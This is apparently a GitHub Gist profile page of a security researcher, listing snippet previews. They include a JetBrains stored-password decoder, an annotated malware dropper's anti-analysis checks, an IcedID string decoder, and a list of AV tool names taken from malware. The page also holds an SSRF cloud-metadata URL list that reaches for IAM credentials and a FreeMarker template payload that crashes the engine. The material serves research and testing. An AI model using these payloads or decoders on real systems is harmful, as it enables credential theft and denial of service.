Skip to content

Instantly share code, notes, and snippets.

🇨🇿
Czeching out your git secrets 🙃

Dylan Katz Plazmaz

🇨🇿
Czeching out your git secrets 🙃
Block or report user

Report or block Plazmaz

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@Plazmaz
Plazmaz / jetbrains_encoding.py
Created Nov 7, 2019
This is what JetBrains uses(used?) for encoding webServers.xml and other configs
View jetbrains_encoding.py
# Source file:
# http://git.jetbrains.org/?p=idea/community.git;a=blob_plain;f=platform/platform-api/src/com/intellij/openapi/util/PasswordUtil.java;hb=HEAD
# PasswordUtil.decodePassword
def decode_jebtrains(encoded):
out = ''
for i in range(0, len(encoded), 4):
out += chr(int(encoded[i:i+4], 16) ^ 57258)
return out
# PasswordUtil.encodePassword
@Plazmaz
Plazmaz / annotated-vbs-dropper.vbs
Last active Oct 17, 2019
Annotate/formatted VBS malware dropper. Don't execute this unless you know what you're doing (duh!)
View annotated-vbs-dropper.vbs
' If these checks fail, this dropper will die in a recursive loop
' Checks if files exist in tmp
SKXSwgvzc
' Checks RAM >= 1024
uOCNREVZV
' Checks for debuggers, AVs, dev tools, and sniffing tools. Fails if any are present.
MHtrCHZpL
' Checks CPU cores >= 3
XWKtvlOt
' Checks disk space >= 60 GB
@Plazmaz
Plazmaz / decode.vbs
Last active Oct 17, 2019
A tool for decoding IcedID arrays
View decode.vbs
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
@Plazmaz
Plazmaz / list.txt
Created Sep 29, 2019
A list of debugging/AV/developer tools extracted from malware
View list.txt
cis.exe
cmdvirth.exe
alive.exe
filewatcherservice.exe
ngvmsvc.exe
sandboxierpcss.exe
analyzer.exe
fortitracer.exe
nsverctl.exe
sbiectrl.exe
View keybase.md

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASDCStXBaUDQPBh36YOQRg_OttfvktUvoBPSi09wFgUwtgo

To claim this, I am signing this object:

@Plazmaz
Plazmaz / 2019-05-06-example-post.md
Last active Jun 25, 2019
Jekyll Metadata Generator
View 2019-05-06-example-post.md

This Is a Post Title!

This is an example post. I really like this post because it is fake and that's cool.

@Plazmaz
Plazmaz / arya-list.md
Last active May 30, 2019
Arya Stark's Kill List (From the Show)
View arya-list.md

Spoilers?

  • Joffrey
  • Cersei
  • Wolder Frey
  • Meryn Trant
  • Tywin Lannister
  • The Red Woman
  • Beric Dondarrion (Removed before death)
  • Thoros of Myr
  • Ilyn Payne
@Plazmaz
Plazmaz / cloud_metadata.txt
Last active Jul 14, 2018 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@Plazmaz
Plazmaz / freemarker-billion.ftl
Last active Nov 20, 2019
FreeMarker Billion Laughs
View freemarker-billion.ftl
<#-- This will crash Freemarker when used as a template -->
<#assign x=[r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>", r"<#list x as y> <#assign x2=y?interpret/> <@x2/> </#list>"]/>
<#list x as y>
<#assign x2=y?interpret/>
<@x2/>
</#list>
View keybase.md

Keybase proof

I hereby claim:

  • I am plazmaz on github.
  • I am plazmaz (https://keybase.io/plazmaz) on keybase.
  • I have a public key ASBxr7rAPgnm0QPh7SAuvPdZSIcoiHtF9wGH3uNplRZtDwo

To claim this, I am signing this object:

You can’t perform that action at this time.